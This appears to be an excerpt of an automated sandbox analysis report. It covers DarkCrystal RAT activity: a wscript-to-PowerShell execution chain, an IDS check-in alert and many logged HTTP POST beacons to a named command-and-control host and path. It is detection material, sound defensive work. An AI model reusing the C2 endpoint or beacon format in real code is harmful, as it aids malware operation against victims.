                                    Suspicious execution chain found
                                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49736 -> 104.21.38.84:80
                                    Source: Joe Sandbox ViewIP Address: 104.21.38.84 104.21.38.84
                                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1844Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1832Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 248156Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /vmLineMultiUniversalwp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 495112cm.renyash.ruContent-Length: 2520Expect: 100-continue
